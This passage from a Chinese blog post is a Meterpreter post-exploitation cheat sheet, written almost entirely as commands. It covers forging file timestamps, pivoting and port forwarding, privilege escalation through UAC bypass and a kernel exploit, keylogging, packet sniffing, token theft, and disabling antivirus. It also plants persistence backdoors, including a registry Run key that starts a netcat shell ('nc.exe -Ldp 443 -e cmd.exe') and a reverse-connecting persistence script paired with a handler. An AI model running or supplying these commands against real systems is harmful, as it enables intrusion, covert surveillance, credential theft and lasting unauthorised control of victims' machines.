<h3 id="4-7-伪造时间戳"><a href="#4-7-伪造时间戳" class="headerlink" title="4.7 伪造时间戳"></a>4.7 伪造时间戳</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter &gt; timestomp c:&#x2F;&#x2F;

Usage: timestomp &lt;file(s)&gt; OPTIONS

OPTIONS:

    -a &lt;opt&gt;  #设置文件的“上次访问”时间
    -b        #设置MACE时间戳，使EnCase显示空白
    -c &lt;opt&gt;  #设置文件的“创建”时间
    -e &lt;opt&gt;  #设置文件的“mft entry modified”时间
    -f &lt;opt&gt;  #将属性的MACE设置为与提供的文件相同
    -h        Help banner
    -m &lt;opt&gt;  #设置文件的“上次写入”时间
    -r        #在目录上递归设置MACE时间戳
    -v        #显示文件的UTC MACE值
    -z &lt;opt&gt;  #设置文件的所有四个属性（MACE）
例：
timestomp -v C:&#x2F;&#x2F;2.txt   #查看时间戳
timestomp C:&#x2F;&#x2F;2.txt -f C:&#x2F;&#x2F;1.txt #将1.txt的时间戳复制给2.txt<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-8-搜索文件"><a href="#4-8-搜索文件" class="headerlink" title="4.8 搜索文件"></a>4.8 搜索文件</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter &gt; search -h
Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.

OPTIONS:

    -d &lt;opt&gt;  #开始搜索的目录&#x2F;驱动器。留空以搜索所有驱动器(默认值：）
    -f &lt;opt&gt;  #要搜索的文件模式glob(e、 g.*秘密*.doc？）
    -h        Help Banner
    -r &lt;opt&gt;  #递归搜索子目录(默认值：true）<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-9-网络命令"><a href="#4-9-网络命令" class="headerlink" title="4.9 网络命令"></a>4.9 网络命令</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">ipconfig&#x2F;ifconfig
netstat –ano
arp
getproxy   #查看代理信息
route   #查看路由<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-10-端口转发"><a href="#4-10-端口转发" class="headerlink" title="4.10 端口转发"></a>4.10 端口转发</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter &gt; portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L &lt;opt&gt;  #转发：要侦听的本地主机（可选）。反向：要连接的本地主机。
    -R        #表示反向端口正向。
    -h        Help banner.
    -i &lt;opt&gt;  #要与之交互的端口转发条目的索引（请参阅“list”命令）。
    -l &lt;opt&gt;  #转发：要侦听的本地端口。反向：要连接的本地端口
    -p &lt;opt&gt;  #转发：要连接的远程端口。反向：监听的远程端口。
    -r &lt;opt&gt;  #转发：要连接到的远程主机。
例：
portfwd add -l 6666 -p 3389 -r 127.0.0.1
#将目标机的3389端口转发到本地6666端口<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-11-添加路由"><a href="#4-11-添加路由" class="headerlink" title="4.11 添加路由"></a>4.11 添加路由</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter &gt; run autoroute -h

[!] Meterpreter scripts are deprecated. Try post&#x2F;multi&#x2F;manage&#x2F;autoroute.
[!] Example: run post&#x2F;multi&#x2F;manage&#x2F;autoroute OPTION&#x3D;value [...]
[*] Usage:   run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*]   run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1&#x2F;255.255.255.0
[*]   run autoroute -s 10.10.10.1                 # Netmask defaults to 255.255.255.0
[*]   run autoroute -s 10.10.10.1&#x2F;24              # CIDR notation is also okay
[*]   run autoroute -p                            # Print active routing table
[*]   run autoroute -d -s 10.10.10.1              # Deletes the 10.10.10.1&#x2F;255.255.255.0 route
[*] Use the &quot;route&quot; and &quot;ipconfig&quot; Meterpreter commands to learn about available routes
例：
run autoroute -s 192.168.159.0&#x2F;24  #添加到目标环境网络
run autoroute –p  #查看添加的路由
#利用arp_scanner\portscan 进行扫描
run post&#x2F;windows&#x2F;gather&#x2F;arp_scanner RHOSTS&#x3D;
run auxiliary&#x2F;scanner&#x2F;portscan&#x2F;tcp RHOSTS&#x3D;  PORTS&#x3D;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-12-Socks4a代理"><a href="#4-12-Socks4a代理" class="headerlink" title="4.12 Socks4a代理"></a>4.12 Socks4a代理</h3><p><code>autoroute</code>添加完路由后，还可以利用<strong>msf</strong>自带的<code>sock4a</code>模块进行<code>Socks4a</code>代理</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msf&gt; use auxiliary&#x2F;server&#x2F;socks4a 
msf &gt; set srvhost 127.0.0.1
msf &gt; set srvport 1080
msf &gt; run

vi &#x2F;etc&#x2F;proxychains.conf #添加 socks4 127.0.0.1 1080<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-13-信息收集"><a href="#4-13-信息收集" class="headerlink" title="4.13 信息收集"></a>4.13 信息收集</h3><p>位置：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">&#x2F;usr&#x2F;share&#x2F;metasploit-framework&#x2F;modules&#x2F;post&#x2F;windows&#x2F;gather
&#x2F;usr&#x2F;share&#x2F;metasploit-framework&#x2F;modules&#x2F;post&#x2F;linux&#x2F;gather
#常用脚本
run post&#x2F;windows&#x2F;gather&#x2F;checkvm #是否虚拟机
run post&#x2F;linux&#x2F;gather&#x2F;checkvm #是否虚拟机
run post&#x2F;windows&#x2F;gather&#x2F;forensics&#x2F;enum_drives #查看分区
run post&#x2F;windows&#x2F;gather&#x2F;enum_applications #获取安装软件信息
run post&#x2F;windows&#x2F;gather&#x2F;dumplinks   #获取最近的文件操作
run post&#x2F;windows&#x2F;gather&#x2F;enum_ie  #获取IE缓存
run post&#x2F;windows&#x2F;gather&#x2F;enum_chrome   #获取Chrome缓存
run post&#x2F;windows&#x2F;gather&#x2F;enum_patches  #补丁信息
run post&#x2F;windows&#x2F;gather&#x2F;enum_domain  #查找域控<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-14-提权"><a href="#4-14-提权" class="headerlink" title="4.14 提权"></a>4.14 提权</h3><h4 id="4-14-1-getsystem"><a href="#4-14-1-getsystem" class="headerlink" title="4.14.1 getsystem"></a>4.14.1 getsystem</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">getsystem<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ul>
<li><code>getsystem</code>创建一个新的<strong>Windows</strong>服务，设置为<strong>SYSTEM</strong>运行，当它启动时连接到一个命名管道。</li>
<li><code>getsystem</code>产生一个进程，它创建一个命名管道并等待来自该服务的连接。</li>
<li><strong>Windows</strong>服务已启动，导致与命名管道建立连接。</li>
<li>该进程接收连接并调用<code>ImpersonateNamedPipeClient</code>，从而为<strong>SYSTEM</strong>用户创建模拟令牌。</li>
</ul>
<p>然后用新收集的<strong>SYSTEM</strong>模拟令牌产生<strong>cmd.exe</strong>，并且我们有一个<strong>SYSTEM</strong>特权进程。</p>
<h4 id="4-14-2-bypassuac-rb"><a href="#4-14-2-bypassuac-rb" class="headerlink" title="4.14.2 bypassuac.rb"></a>4.14.2 bypassuac.rb</h4><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">bypassuac
#内置多个pypassuac脚本，原理有所不同，使用方法类似，运行后返回一个新的会话，需要再次执行getsystem获取系统权限，如：
use exploit&#x2F;windows&#x2F;local&#x2F;bypassuac
use exploit&#x2F;windows&#x2F;local&#x2F;bypassuac_injection
use windows&#x2F;local&#x2F;bypassuac_vbs
use windows&#x2F;local&#x2F;ask
如使用bypassuac.rb脚本：
msf &gt; use exploit&#x2F;windows&#x2F;local&#x2F;bypassuac
msf &gt; set SESSION 2
msf &gt; run<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="4-14-3-内核漏洞提权"><a href="#4-14-3-内核漏洞提权" class="headerlink" title="4.14.3 内核漏洞提权"></a>4.14.3 内核漏洞提权</h4><p>可先利用enum_patches模块收集补丁信息，然后查找可用的exploits进行提权，需要退出当前连接</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter &gt; run post&#x2F;windows&#x2F;gather&#x2F;enum_patches  #查看补丁信息
msf &gt; use exploit&#x2F;windows&#x2F;local&#x2F;ms13_053_schlamperei
msf &gt; set SESSION 2
msf &gt; exploit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-15-远程桌面-截图"><a href="#4-15-远程桌面-截图" class="headerlink" title="4.15 远程桌面/截图"></a>4.15 远程桌面/截图</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-16-rdp-用户添加"><a href="#4-16-rdp-用户添加" class="headerlink" title="4.16 rdp/用户添加"></a>4.16 rdp/用户添加</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter &gt; run getgui –h

[!] Meterpreter scripts are deprecated. Try post&#x2F;windows&#x2F;manage&#x2F;enable_rdp.
[!] Example: run post&#x2F;windows&#x2F;manage&#x2F;enable_rdp OPTION&#x3D;value [...]
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u &lt;username&gt; -p &lt;password&gt;
Or:    getgui -e

OPTIONS:

    -e        Enable RDP only.
    -f &lt;opt&gt;  Forward RDP Connection.
    -h        Help menu.
    -p &lt;opt&gt;  The Password of the user to add.
    -u &lt;opt&gt;  The Username of the user to add.<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>例：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">#1
run getgui -e #开启远程桌面
run getgui -u lltest2 -p 123456   #添加用户
run getgui -f 6661 –e   #3389端口转发到6661
#2
run post&#x2F;windows&#x2F;manage&#x2F;enable_rdp  #开启远程桌面
run post&#x2F;windows&#x2F;manage&#x2F;enable_rdp USERNAME&#x3D;www2 PASSWORD&#x3D;123456 #添加用户
run post&#x2F;windows&#x2F;manage&#x2F;enable_rdp FORWARD&#x3D;true LPORT&#x3D;6662  #将3389端口转发到6662<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-17-键盘记录"><a href="#4-17-键盘记录" class="headerlink" title="4.17 键盘记录"></a>4.17 键盘记录</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">keyscan_start  #开始键盘记录
keyscan_dump   #导出记录数据
keyscan_stop #结束键盘记录
这边要说一点就是，导出记录的话要在keyscan_stop命令之前，不然结束了就无法导出了
meterpreter &gt; keyscan_start
Starting the keystroke sniffer ...
meterpreter &gt; keyscan_dump  #每次转储后，命令都会打印出来，然后再次转储的话是从上一次键盘结束开始记录的
Dumping captured keystrokes...
fffff&lt;CR&gt;
&lt;CR&gt;
&lt;CR&gt;
fff&lt;CR&gt;
&lt;CR&gt;
&lt;CR&gt;

meterpreter &gt; keyscan_stop
Stopping the keystroke sniffer...<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="4-18-sniffer-抓包"><a href="#4-18-sniffer-抓包" class="headerlink" title="4.18 sniffer 抓包"></a>4.18 sniffer 抓包</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">use sniffer
sniffer_interfaces   #查看网卡
sniffer_start 2   #选择网卡 开始抓包
sniffer_stats 2   #查看状态
sniffer_dump 2 &#x2F;tmp&#x2F;lltest.pcap  #导出pcap数据包
sniffer_stop 2   #停止抓包<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="5-注册表操作"><a href="#5-注册表操作" class="headerlink" title="5  注册表操作"></a>5  注册表操作</h2><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter reg –h
Usage: reg [command] [options]
Interact with the target machine&#39;s registry.

OPTIONS:

    -d &lt;opt&gt;  The data to store in the registry value.#注册表中值的数据
    -h        Help menu.
    -k &lt;opt&gt;  The registry key path (E.g. HKLM\Software\Foo).#注册表键路径
    -r &lt;opt&gt;  The remote machine name to connect to (with current process credentials#要连接的远程计算机名称（使用当前进程凭据）
    -t &lt;opt&gt;  The registry value type (E.g. REG_SZ).#注册表值类型
    -v &lt;opt&gt;  The registry value name (E.g. Stuff).#注册表键名称
    -w        Set KEY_WOW64 flag, valid values [32|64].#设置32位注册列表还是64位
COMMANDS:

    enumkey  Enumerate the supplied registry key [-k &lt;key&gt;]#枚举可获得的键
    createkey  Create the supplied registry key  [-k &lt;key&gt;]#创建提供的注册表项
    deletekey  Delete the supplied registry key  [-k &lt;key&gt;]#删除提供的注册表项
    queryclass Queries the class of the supplied key [-k &lt;key&gt;]#查询键值数据
    setval Set a registry value [-k &lt;key&gt; -v &lt;val&gt; -d &lt;data&gt;]#设置键值
    deleteval  Delete the supplied registry value [-k &lt;key&gt; -v &lt;val&gt;]#删除提供的注册表值
    queryval Queries the data contents of a value [-k &lt;key&gt; -v &lt;val&gt;]#查询值的数据内容<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>注册表设置nc后门</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">upload &#x2F;Users&#x2F;ascotbe&#x2F;Downloads&#x2F;netcat-1.11&#x2F;nc.exe C:\\windows\\system32 #上传nc,前面的是你要上传文件的位置
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run   #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d &#39;C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe&#39; #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc   #查看键值
nc -v 192.168.0.142 443  #攻击者连接nc后门<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="6-令牌操纵"><a href="#6-令牌操纵" class="headerlink" title="6.令牌操纵"></a>6.令牌操纵</h2><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">#假冒令牌
use incognito      
help incognito  #查看帮助
list_tokens -u    #查看可用的token
impersonate_token &#39;NT AUTHORITY\SYSTEM&#39;  #假冒SYSTEM token,或者用下面的
impersonate_token NT\ AUTHORITY\\SYSTEM #不加单引号 需使用\\
execute -f cmd.exe -i –t    # -t 使用假冒的token 执行
或者直接shell
rev2self   #返回原始token<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>steal_token 窃取令牌</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter &gt; steal_token
Usage: steal_token [pid]<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h2 id="7-关闭杀软"><a href="#7-关闭杀软" class="headerlink" title="7 关闭杀软"></a>7 关闭杀软</h2><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">meterpreter &gt; run killav<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h2 id="8-后门植入"><a href="#8-后门植入" class="headerlink" title="8 后门植入"></a>8 后门植入</h2><h5 id="persistence启动项后门"><a href="#persistence启动项后门" class="headerlink" title="persistence启动项后门"></a>persistence启动项后门</h5><p>在<code>C:\Users\XXXXX\AppData\Local\Temp\</code>目录下，上传一个<strong>vbs</strong>脚本<br>在注册表<code>HKLM\Software\Microsoft\Windows\CurrentVersion\Run\</code>加入开机启动项</p>
<pre class="line-numbers language-none"><code class="language-none">BASH
run persistence –h  #查看帮助
run persistence -X -i 5 -p 6661 -r 192.168.159.134
#-X指定启动的方式为开机自启动，-i反向连接的时间间隔(5s) –r 指定攻击者的ip<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>连接后门</strong></p>
<pre class="line-numbers language-none"><code class="language-none">BASH
msf &gt; use exploit&#x2F;multi&#x2F;handler
msf &gt; set payload windows&#x2F;meterpreter&#x2F;reverse_tcp
msf &gt; set LHOST 192.168.159.134
msf &gt; set LPORT 6661
msf &gt; exploit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="metsvc服务后门"><a href="#metsvc服务后门" class="headerlink" title="metsvc服务后门"></a>metsvc服务后门</h4><p>在<code>C:\Users\XXXXX\AppData\Local\Temp\</code>上传了三个文件（<strong>metsrv.x86.dll</strong>、<strong>metsvc-server.exe</strong>、<strong>metsvc.exe</strong>），通过服务启动，服务名为<strong>meterpreter</strong></p>
<pre class="line-numbers language-none"><code class="language-none">BASH
run metsvc –h   # 查看帮助
run metsvc –A   #自动安装后门<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><strong>连接后门</strong></p>
<pre class="line-numbers language-none"><code class="language-none">BASH
msf &gt; use exploit&#x2F;multi&#x2F;handler
msf &gt; set payload windows&#x2F;metsvc_bind_tcp
msf &gt; set RHOST 192.168.159.144
msf &gt; set LPORT 31337
msf &gt; exploit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>参考链接</p>
<p>：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2536">https://xz.aliyun.com/t/2536</a></p>
<p>：<a target="_blank" rel="noopener" href="https://www.ascotbe.com/2020/05/06/MeterpreterCommand/">https://www.ascotbe.com/2020/05/06/MeterpreterCommand/</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">obelia</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://obelia.ml/2021/05/31/msfvenmon-chang-yong-ming-ling-meterpreter-hou-shen-tou-chang-yong-ming-ling/">http://obelia.ml/2021/05/31/msfvenmon-chang-yong-ming-ling-meterpreter-hou-shen-tou-chang-yong-ming-ling/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">obelia</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%B7%A5%E5%85%B7/">
                                    <span class="chip bg-color">工具</span>
                                </a>
                            
                                <a href="/tags/%E5%86%85%E7%BD%91/">
                                    <span class="chip bg-color">内网</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/IMG_3091.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/IMG_3090.jpg" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/06/01/apache-lou-dong/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/15.jpg" class="responsive-img" alt="Apache 漏洞">
                        
                        <span class="card-title">Apache 漏洞</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            Apache漏洞
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-06-01
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            obelia
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/WEB/">
                        <span class="chip bg-color">WEB</span>
                    </a>
                    
                    <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">
                        <span class="chip bg-color">漏洞复现</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/05/27/yu-ming-dns-pei-zhi/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/7.jpg" class="responsive-img" alt="域名/DNS 配置">
                        
                        <span class="card-title">域名/DNS 配置</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            域名/DNS 相关配置
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-05-27
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            obelia
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E9%85%8D%E7%BD%AE/">
                        <span class="chip bg-color">配置</span>
                    </a>
                    
                    <a href="/tags/%E6%9C%8D%E5%8A%A1%E5%99%A8/">
                        <span class="chip bg-color">服务器</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
